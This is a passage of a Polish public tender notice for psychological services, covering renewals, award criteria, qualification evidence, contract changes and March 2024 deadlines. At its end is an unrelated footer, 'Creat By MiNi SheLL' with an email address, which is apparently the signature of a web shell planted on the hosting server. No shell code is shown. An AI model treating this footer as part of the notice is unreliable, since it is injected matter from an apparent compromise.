zgodnie z wymaganiami oraz zasadami jakościowymi opisanymi w SWZ oraz w takiej samej cenie jak realizacja zamówienia podstawowego.<br/>Zamawiający dopuszcza zamówienie rozszerzone w ramach wznowień w postaci przedłużenia realizacji umowy w wymiarze nieprzekraczającym 20 h miesięcznie przez okres maksymalnie 6 miesięcy, liczonych od momentu zakończeniu realizacji umowy zamówienia podstawowego z zastrzeżeniem, że okres wznowienia będzie trwał nie dłużej niż do czasu zakończenia realizacji projektu dofinansowującego przedmiot niniejszego zamówienia.<br/>Zamawiający dopuszcza możliwość wznowienia przedmiotowego zamówienia na okres wskazany w Rozdziale III ust. 30 SWZ, na warunkach określonych w umowie zawartej w wyniku rozstrzygnięcia niniejszego postępowania z wyłonionym Wykonawcą.<br/>Jeśli Zamawiający zdecyduje się na skorzystanie ze wznowień, zostaną one uruchomione na podstawie jednostronnej decyzji Zamawiającego w formie oświadczenia woli złożonego Wykonawcy, przed końcem realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania. Wykonawcy nie przysługuje roszczenie o wznowienie zamówienia.<br/>Skorzystanie ze wznowienia będzie uzależnione od decyzji Zamawiającego, w tym m.in. od: warunków projektu, bieżących potrzeb, sytuacji rynkowej oraz posiadanych środków finansowych Zamawiającego.<br/>W przypadku skorzystania z prawa do wznowienia, realizacja usług stanowiących przedmiot niniejszego postępowania będzie się odbywała zgodnie z wymaganiami i zasadami jakościowymi opisanymi w niniejszej SWZ i w takiej samej cenie jak realizacja zamówienia podstawowego, ujętych w umowie zawartej w wyniku rozstrzygnięcia niniejszego postępowania z wyłonionym Wykonawcą.<br/>Cena jednostkowa brutto wznowienia będzie tożsama z ceną zamówienia podstawowego wskazaną w umowie. Cena wznowienia, o której mowa w zdaniu poprzedzającym, jest ceną wyrażoną w walucie polskiej (PLN), gdyż Zamawiający dopuszcza rozliczenia wyłącznie w walucie polskiej (PLN). <br/>W związku z powyższym, skorzystanie ze wznowień nie będzie wiązało się z żadnymi dodatkowymi kosztami dla Zamawiającego ani z jakimikolwiek roszczeniami ze strony Wykonawcy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów za wszystkie kryteria oceny ofert wg wzoru LP = C +K+D, gdzie: <br/>LP - to całkowita liczba punktów przyznana ofercie,<br/>C - liczba punktów przyznana ofercie za kryterium „Cena”,<br/>K – to liczba punktów przyznana ofercie za kryterium „Dodatkowe kwalifikacje psychologa skierowanego do realizacji zamówienia”,<br/>D – to liczba punktów przyznana ofercie za kryterium „Doświadczenie psychologa skierowanego do realizacji zamówienia”,<br/>końcowy wynik zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe kwalifikacje psychologa skierowanego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie psychologa skierowanego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dot. zdolności technicznej lub zawodowej – <br/>w zakresie wykształcenia, kwalifikacji zawodowych i doświadczenia osób skierowanych przez Wykonawcę do realizacji przedmiotowego zamówienia - Zamawiający wymaga, aby Wykonawca wykazał, że będzie dysponował w trakcie realizacji zamówienia co najmniej jedną osobą, która będzie posiadała łącznie co najmniej: ukończone studia wyższe na kierunku psychologia potwierdzone dyplomem magistra oraz trzyletnie doświadczenie zawodowe na stanowisku psychologa w pracy z osobami dorosłymi.<br/>Uwaga - W ramach niniejszego zamówienia, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych zadań, o których mowa w art. 60 i art. 121 PZP polegających na: świadczeniu usług psychologicznych, sporządzaniu opinii psychologicznych, wykonywaniu poradnictwa i doradztwa psychologicznego zarówno grupowego jak i indywidualnego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Od Wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu wykazania braku podstaw wykluczenia, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia zawarto w załączniku nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Od Wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług (…) wraz z informacjami na temat ich kwalifikacji zawodowych, w tym uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu zawarto w załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe w postaci:<br/>a)	dokumentów potwierdzających kwalifikacje zawodowe w zawodzie psycholog, osoby o której mowa w Rozdziale III ust. 12 SWZ, tj. osoby wykazywanej na potwierdzenie spełniania warunku udziału w postępowaniu, potwierdzone dyplomem ukończonych studiów wyższych magisterskich na kierunku psychologia lub zaświadczeniem z ukończonej uczelni stwierdzającym ukończone studia wyższe na kierunku psychologia oraz prawo posługiwania się tytułem zawodowym magistra psychologii.<br/>b)	Dokumentów w postaci zaświadczeń lub świadectw pracy wystawionych przez pracodawcę/-ów, potwierdzających co najmniej 3 lata udokumentowanego doświadczenia zawodowego na stanowisku psychologa w pracy z osobami dorosłymi, osoby o której mowa w Rozdziale III ust. 12 SWZ, tj. osoby wykazywanej na potwierdzenie spełniania warunku udziału w postępowaniu. W przypadku osób prowadzących jednoosobową działalność gospodarczą w zakresie świadczonych usług psychologicznych, wymagane jest złożenie oświadczenia o posiadanym co najmniej trzyletnim doświadczeniu zawodowym na stanowisku psychologa w pracy z osobami dorosłymi wraz z odpisem z właściwego rejestru handlowego lub zawodowego np. CEIDG, KRS. Zamawiający dopuszcza samodzielne pobranie odpisów z bezpłatnych baz danych publicznie dostępnych, a zawartych w rejestrach KRS i CEIDG.<br/>c)	Dokumentów potwierdzających deklarowane w Formularzu ofertowym dodatkowe kwalifikacje psychologa skierowanego do realizacji zamówienia, tj. osoby wykazywanej w kryterium oceny ofert, o którym mowa w Rozdziale XV ust. 3 SWZ. W tym celu, Wykonawca jest zobowiązany dołączyć do oferty dokumenty potwierdzające deklarowane dodatkowe kwalifikacje psychologa skierowanego do realizacji niniejszego zamówienia w postaci: dyplomów, certyfikatów, zaświadczeń lub innych dokumentów wystawionych przez niezależne od Wykonawcy jednostki, potwierdzające ukończone przez tego psychologa odpowiednio:<br/>•	studia podyplomowe z obszaru: psychogerontologii lub psychologii lub psychoterapii lub psychiatrii,<br/>•	uprawnienia psychoterapeuty potwierdzone certyfikatem Polskiego Towarzystwa Psychologicznego lub Polskiego Towarzystwa Psychiatrycznego,<br/>•	kursy/szkolenia/seminaria: z zakresu TSR (Terapia skoncentrowana na rozwiązaniach - ang. solution focused brief therapy) lub z zakresu psychologicznego wsparcia seniorów lub osób z niepełnosprawnościami.<br/>Uwaga: Przedmiotowe środki dowodowe wskazane w lit. c powyżej, nie podlegają uzupełnieniu.<br/>W przypadku niedołączenia przedmiotowych środków dowodowych wymaganych wraz z ofertą lub złożenia przedmiotowych środków dowodowych niepotwierdzających zadeklarowanych w Formularzu ofertowym informacji, Zamawiający nie przyzna punktów za to kryterium oceny ofert.<br/>d)	Dokumentów potwierdzających deklarowane w Formularzu ofertowym doświadczenie zawodowe psychologa skierowanego do realizacji zamówienia, tj. osoby wykazywanej w kryterium oceny ofert, o którym mowa w Rozdziale XV ust. 3 SWZ. W tym celu, Wykonawca jest zobowiązany dołączyć do oferty dokumenty potwierdzające posiadane doświadczenie zawodowe psychologa skierowanego do realizacji niniejszego zamówienia w postaci np.: zaświadczeń lub świadectw pracy wystawionych przez pracodawców lub zleceniodawców, potwierdzających udokumentowane doświadczenie zawodowe na stanowisku psycholog. W przypadku osób prowadzących działalność gospodarczą wymagane jest złożenie oświadczenia o posiadanym doświadczeniu zawodowym (stażu pracy na stanowisku psycholog) na potwierdzenie kryterium oceny ofert wraz z odpisem z właściwego rejestru handlowego lub zawodowego np. CEIDG, KRS.<br/>Uwaga: Przedmiotowe środki dowodowe wskazane w lit. d powyżej, nie podlegają uzupełnieniu!<br/>W przypadku niedołączenia przedmiotowych środków dowodowych wymaganych wraz z ofertą lub złożenia przedmiotowych środków dowodowych niepotwierdzających zadeklarowanych w Formularzu ofertowym informacji, Zamawiający nie przyzna punktów za to kryterium oceny ofert. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 4)	Przedmiotowe środki dowodowe w postaci:<br/>a)	dokumentów potwierdzających kwalifikacje zawodowe w zawodzie psycholog, osoby o której mowa w Rozdziale III ust. 12 SWZ, tj. osoby wykazywanej na potwierdzenie spełniania warunku udziału w postępowaniu, potwierdzone dyplomem ukończonych studiów wyższych magisterskich na kierunku psychologia lub zaświadczeniem z ukończonej uczelni stwierdzającym ukończone studia wyższe na kierunku psychologia oraz prawo posługiwania się tytułem zawodowym magistra psychologii.<br/>b)	Dokumentów w postaci zaświadczeń lub świadectw pracy wystawionych przez pracodawcę/-ów, potwierdzających co najmniej 3 lata udokumentowanego doświadczenia zawodowego na stanowisku psychologa w pracy z osobami dorosłymi, osoby o której mowa w Rozdziale III ust. 12 SWZ, tj. osoby wykazywanej na potwierdzenie spełniania warunku udziału w postępowaniu. W przypadku osób prowadzących jednoosobową działalność gospodarczą w zakresie świadczonych usług psychologicznych, wymagane jest złożenie oświadczenia o posiadanym co najmniej trzyletnim doświadczeniu zawodowym na stanowisku psychologa w pracy z osobami dorosłymi wraz z odpisem z właściwego rejestru handlowego lub zawodowego np. CEIDG, KRS. Zamawiający dopuszcza samodzielne pobranie odpisów z bezpłatnych baz danych publicznie dostępnych, a zawartych w rejestrach KRS i CEIDG. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy, którego wzór stanowi załącznik nr 1 do SWZ;<br/>2)	Oświadczenie o niepodleganiu wykluczeniu, w tym na podstawie art. 7 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 ze zm.) i spełnianiu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 PZP. Wzory oświadczeń zawarto odpowiednio w załączniku nr 2 i załączniku nr 3 do SWZ;<br/>3)	Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzedzającym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów (np. pełną nazwę, NIP, REGON, itp.).<br/>Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS lub CEIDG lub innego właściwego rejestru, Zamawiający może żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy lub odpowiednio: do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP lub Podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach;<br/>4)	Pełnomocnictwo upoważniające do złożenia oferty (jeśli dotyczy).<br/>5)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - o ile ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, spółki cywilne (jeśli dotyczy).<br/>6)	Zobowiązanie podmiotu udostępniającego zasoby, na których zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną Wykonawca się powołuje w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy). Wzór zobowiązania zawarto w załączniku nr 4 do SWZ (jeśli dotyczy).<br/>7)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, o którym mowa w art. 117 ust. 4 PZP (jeśli dotyczy). Wzór oświadczenia zawarto w załączniku nr 5 do SWZ.<br/>8)	Informacje dot. tajemnicy przedsiębiorstwa wraz z uzasadnieniem zastrzeżenia informacji znajdujących się w ofercie, w tym spełniania przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu:<br/>1)	warunek dotyczący zdolności do występowania w obrocie gospodarczym, o którym mowa w art. 112 ust. 2 pkt 1 PZP – nie dotyczy,<br/>2)	warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 PZP – nie dotyczy,<br/>3)	warunek dotyczący sytuacji ekonomicznej lub finansowej, o którym mowa w art. 112 ust. 2 pkt 3 PZP – nie dotyczy,<br/>4)	warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP, tj. warunek określony w rozdziale XI ust. 2 pkt 4 lit. b) SWZ, musi spełnić samodzielnie co najmniej jeden z Wykonawców.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają (…) usługi, do realizacji których te zdolności są wymagane.<br/>3.	W przypadku, o którym mowa w art. 117 ust. 3 PZP, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które (…) usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia zawarto w załączniku nr 5 do SWZ.<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa każdy z Wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Wzór oświadczenia zawarto w załączniku nr 2 do SWZ.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, składając stosowne pełnomocnictwo. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe informacje zawiera paragraf 8 załącznika nr 6 do SWZ. 1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej lub formy elektronicznej, pod rygorem nieważności w postaci aneksu podpisanego przez obie Strony niniejszej umowy, i będą dopuszczalne w granicach unormowania ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, zgodnie z obopólnym ustaleniem Stron w zakresie wybranej formy podpisywania dokumentów.<br/>2.	Strony ustalają, że zmianie mogą podlegać w szczególności postanowienia dotyczące:<br/>1)	terminów obowiązywania niniejszej umowy w przypadku cofnięcia dofinansowania lub jego wstrzymania lub zmiany terminów realizacji projektu, które wskazano w umowie zawartej z instytucją zarządzającą na okoliczność realizowanego projektu,<br/>2)	ilości zleconych Wykonawcy godzin świadczonych usług z uwagi na bieżące możliwości finansowe Zamawiającego oraz warunki projektu,<br/>3)	rozliczeń między Stronami i zmiany warunków realizowanej z Wykonawcą umowy w związku z aktualną treścią umowy zawartej na realizację projektu będącego źródłem finansowania niniejszej umowy,<br/>4)	przedłużenia terminu obowiązywania umowy z uwzględnieniem wznowień lub opcji<br/>5)	wynagrodzenia Wykonawcy spowodowanego dokonaną waloryzacją lub możliwościami finansowymi Zamawiającego wynikającymi z budżetu projektu,<br/>6)	oznaczenia stron umowy zarówno wykonawcy jak i zamawiającego, w tym ich nazwy oraz danych teleadresowych względem danych wskazanych w komparycji niniejszej umowy, a wynikających z: sukcesji, przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, <br/>7)	wykazu osób skierowanych do realizacji przedmiotu umowy,<br/>8)	zaistnienia okoliczności leżących po stronie Zamawiającego w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,<br/>9)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron,<br/>10)	zmiany osób i podmiotów zdolnych do wykonywania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, po uzyskaniu zgody Zamawiającego,<br/>11)	uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,<br/>12)	wynagrodzenia Wykonawcy związane ze zwiększeniem lub zmniejszeniem liczby podopiecznych Zamawiającego korzystających z usług psychologicznych w ramach niniejszej umowy, <br/>13)	konieczności zmiany umowy spowodowanej okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, a które mają wpływ na należytą realizację umowy,<br/>14)okoliczności niezależnych od Stron, gdzie wartość zmiany nie przekracza 50% wartości zamówienia podstawowego pierwotnie określonego,<br/>15)gdy Wykonawcę musi zastąpić nowy Wykonawca, w wyniku połączenia, podziału, przekształcenia, sukcesji, zmiany formy prawnej, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,<br/>16)podjęcie przez Wykonawcę decyzji o powierzeniu podwykonawcy/com realizacji części zamówienia, która miała być zrealizowana siłami własnymi Wykonawcy i/lub decyzji o rezygnacji z planowanego podwykonawstwa na rzecz wykonania części zamówienia siłami własnymi Wykonawcy i/lub decyzji o zmianie/rezygnacji z podwykonawcy – zmiana zakresu podwykonawstwa, z zastrzeżeniem art. 462 ust. 3 ustawy Prawo zamówień publicznych,<br/>17) gdy wykonanie umowy wynika ze zmiennych potrzeb Zamawiającego, czego nie można było wcześniej przewidzieć, zakres godzinowo-rzeczowy umowy może zostać zmieniony przez Zamawiającego bez skutków finansowych i prawnych dla Zamawiającego, (...) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-01 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia na dedykowanej stronie prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-01 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W ramach niniejszego zamówienia, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych zadań, o których mowa w art. 60 i art. 121 PZP polegających na: świadczeniu usług psychologicznych, sporządzaniu opinii psychologicznych, wykonywaniu poradnictwa i doradztwa psychologicznego zarówno grupowego jak i indywidualnego.

Creat By MiNi SheLL
Email: jattceo@gmail.com